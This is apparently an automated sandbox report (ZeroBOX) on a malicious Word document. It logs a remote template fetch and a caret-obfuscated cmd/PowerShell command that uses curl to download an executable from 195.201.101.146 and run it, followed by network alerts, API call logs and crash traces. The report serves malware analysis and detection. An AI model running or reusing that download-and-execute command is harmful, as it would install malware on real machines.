Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Dec. 13, 2022, 10 a.m.	Dec. 13, 2022, 10:03 a.m.

Size	155.6KB
Type	Zip archive data, at least v2.0 to extract
MD5	`f64b643de2bc7c368b0a13d12c584a09`
SHA256	`3b55624bf812c25712465543d5c0d687f523d3a93f6879817cef93dffef20888`
CRC32	`F1CAAFAE`
ssdeep	`3072:Z4xNqHlnUjeb+oBlRvDNRmc95BR/YCkXr03++0A:CxNqNmW+2RvDvJF/YCY2P`
Yara	docx - Word 2007 file format detection Doc_XML_Downloader - Detect a MS Office document with embedded XML Downloader

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\이상민.docx
2188
- cmd.exe cmd /c pow^ers^hell/W 01 c^u^rl htt^p://195.201.101.146/12341rgergg435g4tr.e^xe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
  2452
  - powershell.exe powershell /W 01 curl http://195.201.101.146/12341rgergg435g4tr.exe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
    1620
    - curl.exe "C:\util\curl\curl.exe" http://195.201.101.146/12341rgergg435g4tr.exe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
      2652
    - 43et5rgr6hty6h76tuyr6t.exe "C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe"
      1364
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
195.201.101.146	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49173 -> 195.201.101.146:80	2031379	ET INFO Doc Requesting Remote Template (.dotm)	Potentially Bad Traffic
TCP 192.168.56.102:49182 -> 195.201.101.146:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.102:49182 -> 195.201.101.146:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.102:49182 -> 195.201.101.146:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic
TCP 195.201.101.146:80 -> 192.168.56.102:49182	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 195.201.101.146:80 -> 192.168.56.102:49182	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 13, 2022, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 13, 2022, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 13, 2022, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 13, 2022, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 13, 2022, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 13, 2022, 10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 13, 2022, 10 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fbc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069fb00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f140 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 13, 2022, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069f140 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 13, 2022, 10 a.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Dec. 13, 2022, 10 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x6ab133cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6ab25dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6ab13b21 SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x6ab22074 SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x67c985c7 ??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28 DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4 _MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991 _MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d _MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x8007007b exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 127923140 registers.edi: 127923304 registers.eax: 127923140 registers.ebp: 127923220 registers.edx: 0 registers.ebx: 127924356 registers.esi: 2147942523 registers.ecx: 2147483648	1	0	0
__exception__ Dec. 13, 2022, 10 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x6ab133cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6ab25dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6ab13b21 SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x6ab23102 SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x67cbf7d0 ??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed ??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871 DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef _MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0 _MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab ??0OdfStgParams@@QAE@XZ+0xf1bd8 mso+0xff4ade @ 0x709c4ade DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4 _MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0 _MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991 _MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4 _MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b _MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a _MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41 _MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43 _GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37 _GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d _GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667 _GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169 _GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6 wdCommandDispatch-0x964 winword+0x1602 @ 0x2fe71602 wdCommandDispatch-0x9cc winword+0x159a @ 0x2fe7159a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 3392220 registers.edi: 3392384 registers.eax: 3392220 registers.ebp: 3392300 registers.edx: 0 registers.ebx: 3393436 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Dec. 13, 2022, 10 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x6ab133cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6ab25dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6ab13b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x6ab22074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x67c985c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 127923140
registers.edi: 127923304
registers.eax: 127923140
registers.ebp: 127923220
registers.edx: 0
registers.ebx: 127924356
registers.esi: 2147942523
registers.ecx: 2147483648

__exception__

Dec. 13, 2022, 10 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x6ab133cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6ab25dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6ab13b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x6ab23102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x67cbf7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab
??0OdfStgParams@@QAE@XZ+0xf1bd8 mso+0xff4ade @ 0x709c4ade
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43
_GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37
_GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d
_GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667
_GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169
_GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6
wdCommandDispatch-0x964 winword+0x1602 @ 0x2fe71602
wdCommandDispatch-0x9cc winword+0x159a @ 0x2fe7159a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 3392220
registers.edi: 3392384
registers.eax: 3392220
registers.ebp: 3392300
registers.edx: 0
registers.ebx: 3393436
registers.esi: 3221549073
registers.ecx: 2147483648

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	OPTIONS http://195.201.101.146/
suspicious_features	Connection to IP address	suspicious_request	HEAD http://195.201.101.146/o19wzg.dotm
suspicious_features	Connection to IP address	suspicious_request	GET http://195.201.101.146/o19wzg.dotm
suspicious_features	Connection to IP address	suspicious_request	GET http://195.201.101.146/12341rgergg435g4tr.exe

Performs some HTTP requests (4 events)

request	OPTIONS http://195.201.101.146/
request	HEAD http://195.201.101.146/o19wzg.dotm
request	GET http://195.201.101.146/o19wzg.dotm
request	GET http://195.201.101.146/12341rgergg435g4tr.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 133 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a16a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0686d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0686d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x69224000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x689a1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x689a2000 process_handle: 0xffffffff	1
